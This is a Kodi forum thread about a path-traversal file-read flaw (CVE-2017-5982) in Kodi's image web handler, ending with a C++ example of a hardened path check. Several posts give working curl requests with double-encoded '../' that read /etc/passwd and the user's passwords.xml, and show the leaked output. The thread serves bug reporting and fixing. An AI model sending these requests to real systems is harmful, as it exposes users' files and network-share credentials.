Local File Include (CVE-2017-5982) is back
Kodi Community Forum (https://forum.kodi.tv), Thread: Local File Include (CVE-2017-5982) is back (/showthread.php?tid=335695)

Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-20

I believe the Local File Include (CVE-2017-5982) is back. I know that bool CFileUtils::ZebraListAccessCheck(const std::string &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, but it doesn't. The code from https://www.exploit-db.com/exploits/41312/ still works on:

    NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
    NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
    Kodi compiled Jun 7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

    http://pi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml

    <passwords>
      <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://username:password@smb/media/</to>
      </path>
    </passwords>

RE: Local File Include (CVE-2017-5982) is back - popcornmix - 2018-09-21

Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months.

RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-21

I will test tonight.

RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-21

You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi-18-leia-builds-for-raspberry-pi/20631 if you wish to test with OSMC still for consistency.

RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

On OSMC it still exists:

    22:31:01.228 T:1918357504 NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit
    22:31:01.229 T:1918357504 NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
    22:31:01.229 T:1918357504 NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

    curl http://kodi/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/bin/false
    systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:102:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:104:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    ntp:x:105:107::/home/ntp:/bin/false
    messagebus:x:106:108::/var/run/dbus:/bin/false
    statd:x:107:65534::/var/lib/nfs:/bin/false
    avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
    osmc:x:1000:1000::/home/osmc:/bin/bash

RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability.

    curl http://kodi:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
    <html><head><title>File not found</title></head><body>File not found</body></html>

Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 18.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen.

RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-22

We haven't got any patches here that should introduce this vulnerability. Try with a file in the Ubuntu user's home folder, as /etc/passwd may simply be inaccessible if running as an unprivileged user.

RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-24

@Sam.Nazarko The bigger issue is this one:

    curl http://kodi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml

    <passwords>
      <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to>
      </path>
    </passwords>

I replaced my server name with "smb", the user with "smbuser", and the password with "password" because I'm not posting those on the site.

RE: Local File Include (CVE-2017-5982) is back - Milhouse - 2018-09-24

This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC. Ubuntu with latest Kodi 18 *is* vulnerable.

Test script ("kvuln"):

special://envhome is /home/neil, and paths to be exploited are relative to that root.

An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851

If anything else in this area has been implemented (can't find anything) then it is now a regression.

I'll move this thread to OS Independent/Other.

RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-03

Fix is underway: https://github.com/xbmc/xbmc/pull/14501

RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-14

fyi: Fix merged
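
The request path quoted in the thread carries its separators double-encoded (`%252f`), so after one decoding pass it still contains `%2f` rather than `/`. The following C++ example, added here as an illustration and not taken from Kodi's source or from either pull request, contrasts a check that decodes once with one that decodes until stable and then resolves `..` lexically; the function names, the single served root and the handling of the `image://` prefix are assumptions.

```cpp
#include <cctype>
#include <string>

// One percent-decoding pass; malformed escapes are copied through unchanged.
std::string DecodeOnce(const std::string& in) {
  std::string out;
  for (std::string::size_type i = 0; i < in.size(); ++i) {
    bool esc = in[i] == '%' && i + 2 < in.size() &&
               std::isxdigit(static_cast<unsigned char>(in[i + 1])) &&
               std::isxdigit(static_cast<unsigned char>(in[i + 2]));
    out += esc ? static_cast<char>(std::stoi(in.substr(i + 1, 2), nullptr, 16)) : in[i];
    if (esc) i += 2;
  }
  return out;
}

// Constructed weak check: decodes once, then looks for a literal "../".
bool NaiveCheck(const std::string& urlPath) {
  return DecodeOnce(urlPath).find("../") == std::string::npos;
}

// Hypothetical hardened check: decode until stable, then resolve segments lexically.
bool StaysInsideRoot(const std::string& urlPath) {
  std::string s = urlPath;
  bool stable = false;
  for (int round = 0; round < 8 && !stable; ++round) {
    std::string next = DecodeOnce(s);
    stable = (next == s);
    s = next;
  }
  if (!stable || s.find('\0') != std::string::npos) return false;
  const std::string scheme = "image://";  // assumed wrapper, as in the thread's URL
  if (s.compare(0, scheme.size(), scheme) == 0) s.erase(0, scheme.size());
  if (!s.empty() && (s[0] == '/' || s[0] == '\\')) return false;  // absolute path
  int depth = 0;  // directory levels below the served root
  for (std::string::size_type pos = 0; pos <= s.size();) {
    auto end = s.find_first_of("/\\", pos);
    if (end == std::string::npos) end = s.size();
    const std::string seg = s.substr(pos, end - pos);
    if (seg == "..") { if (--depth < 0) return false; }
    else if (!seg.empty() && seg != ".") ++depth;
    pos = end + 1;
  }
  return true;
}

int main() {  // exits 0 when the request path quoted in the thread is rejected
  return StaysInsideRoot("image%3A%2F%2F%2e%2e%252fetc%252fpasswd") ? 1 : 0;
}
```

Both functions take the part of the request path that follows `/image/`. A lexical check like this complements, and does not replace, resolving the final path on disk and comparing it with the allowed directory, since symlinks are invisible to it.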